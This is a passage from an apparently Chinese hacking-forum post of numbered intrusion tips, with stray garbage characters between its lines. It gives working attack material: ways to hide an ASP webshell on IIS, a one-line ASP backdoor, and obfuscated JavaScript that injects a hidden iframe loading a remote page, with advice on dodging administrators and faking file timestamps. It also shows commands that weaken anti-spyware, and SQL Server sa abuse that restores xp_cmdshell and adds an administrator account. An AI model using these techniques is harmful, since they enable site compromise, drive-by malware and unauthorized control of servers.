5 G8 E' j# H9 I: L* [, x拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
; r0 d( _! l0 m4 V2 _通过web访问ASP木马:http://ip/images../news.asp?action=login
; l3 j$ w$ t4 }, ?如何删除非标准目录:rmdir images..\ /s
7 C5 p- [6 l: @; M. Y/ k3 X% S2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
w; \4 |7 j9 ]0 y0 d4 X. nmkdir programme.asp
& s& j' g/ f) ^& _新建1.txt文件内容:<!--#include file=”12.jpg”-->! q0 K* `4 g) h% C+ P
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件. n% l, E* g) T, ~( v
attrib +H +S programme.asp9 D0 b2 l7 d5 a G7 `
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
: S0 x1 T) ^+ s
4 ?6 Z0 |4 d! e: c# Q9 A1 W5 e/ d4 S54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
& K# t, S, l& C6 N- ` q; ?+ v然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。& a# m% y! [. P) F! m. L
9 v1 b/ p7 L, c# w) J; n' O" ~
55、JS隐蔽挂马" Q" ~' G1 i( ?9 _
1., }: u. }# [: V, H+ t& k
var tr4c3="<iframe src=ht";
+ J2 f) I, U6 f9 }tr4c3 = tr4c3+"tp:/";! y0 `% R* p9 Z' F, b
tr4c3 = tr4c3+"/ww";7 j$ t. ~& X! i6 i! K( |
tr4c3 = tr4c3+"w.tr4";* x0 y* o# R/ N7 I1 b. ?0 O
tr4c3 = tr4c3+"c3.com/inc/m";8 A4 g6 s' t/ X' T( N9 I$ N+ Y
tr4c3 = tr4c3+"m.htm style="display:none"></i";- f6 \& `8 h$ a3 k7 S' f; G2 a
tr4c3 =tr4c3+"frame>'";5 E! }7 _9 t* c: @; H" i
document.write(tr4c3);, M6 s8 E( k( G: V
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
* e4 Y; ~/ J! ]# \: T$ n, _$ @) e8 c0 X* M
2.5 w* Q9 E2 J# ?& ~9 O" I" r
转换进制,然后用EVAL执行。如
5 ?7 w* v; W4 U8 r6 P7 }eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");5 @$ {$ B( g3 G3 G
不过这个有点显眼。4 k+ k+ q6 h4 Y" W, @, u& z; w5 }
3.
! g( j ]: l5 Y M3 U# O1 ^document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');' o! g* n; s* x; f$ v6 [
最后一点,别忘了把文件的时间也修改下。
7 g a, u% p( q; G3 v
9 t/ {( l5 E S. ]' c5 l56.3389终端入侵常用DOS命令% H0 I0 H8 t" Q% |0 H V
taskkill taskkill /PID 1248 /t6 M$ B( E0 J- M6 p5 M" |
" d1 ^* r% F" F$ ?6 A8 s [7 E
tasklist 查进程. v1 h5 e% |+ X: ?: t* X6 q/ B6 L
% n$ F' V0 o: M) x! N
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限 s) i( [8 I1 b: G
iisreset /reboot& m7 ]5 I1 v! H" b% o: z
tsshutdn /reboot /delay:1 重起服务器
* u. s- [/ x5 |
7 i7 l- e* k* ~3 Llogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,9 g6 p4 r7 x+ J
" p: l. R+ j- `. ^/ Tquery user 查看当前终端用户在线情况
) @! `8 ?% a' t0 t
7 H; Q) `$ E3 h& ]" o要显示有关所有会话使用的进程的信息,请键入:query process *
" i# r9 x: {, ]5 q; w# k6 p
( J0 ^4 N/ g5 _要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
5 S+ k: j) y; {
: o7 B8 i* G, U, X要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2# C# T7 g4 F& J. j: S* L7 @' X
6 f1 W. j) i7 z8 _9 e: o9 ~
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
' D" G% L% h1 `# C# ~' G
3 E& `# a _# O, y! ]+ L命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启2 N* F: p9 ~! d2 e9 F2 S
7 G3 |4 L! M1 ~7 @* d
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
r5 V; I K! j7 p$ ]
$ ]' r! `$ O% t2 ~0 J. ]% X命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。+ Y. `5 A$ _, _, x, ^* e4 u3 n
, |/ A, w/ R0 P) C7 B6 C
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
$ K: d. Q' J, ?3 i3 p2 t/ y d
/ I: V4 s+ j+ M G @56、在地址栏或按Ctrl+O,输入:
% `7 c$ s# J- n" pjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
- K& v+ v" P( l. H6 y4 h$ I! {
- t; m% ?" K! u0 E( I4 l' Q7 [源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
1 B- e! H% k& s* y) j- E1 g; q. s0 G* P
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,1 M/ ~- ^' l9 Z4 g& g4 L9 @
用net localgroup administrators是可以看到管理组下,加了$的用户的。0 W' x# X: x5 ? K5 a! T
$ Z) Q/ V* x, V" W
58、 sa弱口令相关命令
' m2 k+ p Y. z' L# U# ~, o/ F8 V8 Q; g! d' P+ a! P
一.更改sa口令方法:. t8 A, u6 n1 q7 F( t) u* N8 h, x
用sql综合利用工具连接后,执行命令:
6 I$ G# c9 j" l1 `3 ^; D3 ?( _exec sp_password NULL,'20001001','sa'
( G. ~' |" b i( T. x) w& H(提示:慎用!)5 S( H, ~' W) O3 U
8 A% Z( e: L) [( f% z* ~
二.简单修补sa弱口令.' R# z( s `9 e) k) o0 U
* J$ x5 U4 m- g& a方法1:查询分离器连接后执行:- ]( y5 ?' t0 Z3 j4 f
if exists (select * from" n" P6 ~% V. b* r, b
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and: e* p3 l$ y+ A) h+ E. f% \
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
; Z) r4 ?; O/ a, r5 P( Z! o" A( A4 v" j1 V
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'0 X; E4 _6 h) c- a0 G6 L) U ?
: [4 D6 K. F3 c C' t7 B. h1 K
GO
+ k5 u) E; S. J( [
% y0 T) f9 Q) w: ]4 u7 s. x- r然后按F5键命令执行完毕
( ~" Z: g2 H3 D$ z' w& u3 e0 c# ]1 d; q% l- u# Z3 D
方法2:查询分离器连接后$ k0 @* k. Q! }) X0 U* v+ V
第一步执行:use master
, s1 X% W6 ^' h4 R* X8 D2 r- O7 u7 I第二步执行:sp_dropextendedproc 'xp_cmdshell'
6 b& J- A; d Q& i% D$ _然后按F5键命令执行完毕& x+ t- g; ^; z+ |
' C: l7 W& M) s8 o0 C
z: H+ q0 j h) ]2 h三.常见情况恢复执行xp_cmdshell.
8 \# l5 Q) L; c# Y4 l6 w2 j+ F' y# a3 O( U( m$ Q
$ B5 o+ G9 u) H4 S1 未能找到存储过程'master..xpcmdshell'.
- q9 n: {( d+ ]1 T& | 恢复方法:查询分离器连接后,/ k y4 `9 g7 r& j4 O) v% L$ B
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
8 p8 A& X6 y/ X! }0 S8 P第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ Z3 a- C, ~; m9 V然后按F5键命令执行完毕
+ g8 \+ m' X! R- R
4 k3 }/ L @8 H/ L( m. H2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。) X( z9 m3 P: Z- y
恢复方法:查询分离器连接后,
! s' e$ n/ |9 [5 e; i) @第一步执行:sp_dropextendedproc "xp_cmdshell"
: H+ q- p1 I3 A$ u9 s( Y第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
0 w6 Y* p' O% F: Q0 _7 q9 T) j1 k然后按F5键命令执行完毕$ n1 v* c/ R! p* H1 d
) J3 A9 m( N: H7 [9 ]/ p3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)+ s d% g( {* R, a
恢复方法:查询分离器连接后,$ d( K) Y8 q) J& b& H2 o! W* f
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'. \& `, `7 Z& J/ N; E( @, v- `; ]
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 2 l& q4 C6 A+ N* Z4 C+ x
然后按F5键命令执行完毕" O, ?+ R& Z" t1 B/ Q" O
$ W. O8 u/ E, [2 {- \! ~6 `四.终极方法.9 J6 s2 ] s1 @/ k
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:& Z) s+ e% b. C& Y' Z4 d9 Q( U( r) D; e
查询分离器连接后,
3 W7 d! r- B' J5 D1 J2000servser系统:
, [ ]4 b& u; j |0 ?& ^) `declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
1 |5 z K5 m, k) q5 U# x$ ~" \
' V7 [ I5 K( v. x: X% G v" ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
) M/ l& B$ S" C T9 V, G
* z& M6 H) @0 J$ S0 I2 V* Jxp或2003server系统:
( _' `0 q3 [% E9 U* X* n& ~. M, @, Y, `) e2 o8 j, |7 W2 Z7 ~% q8 m7 f
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
1 ]7 b$ ^9 q ~1 J8 ^
( m2 ^9 `+ @8 e& Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
1 K7 c0 ^0 I* X/ q- x, l$ Z |
发表于 2012-9-15 14:51:03
收藏
支持
反对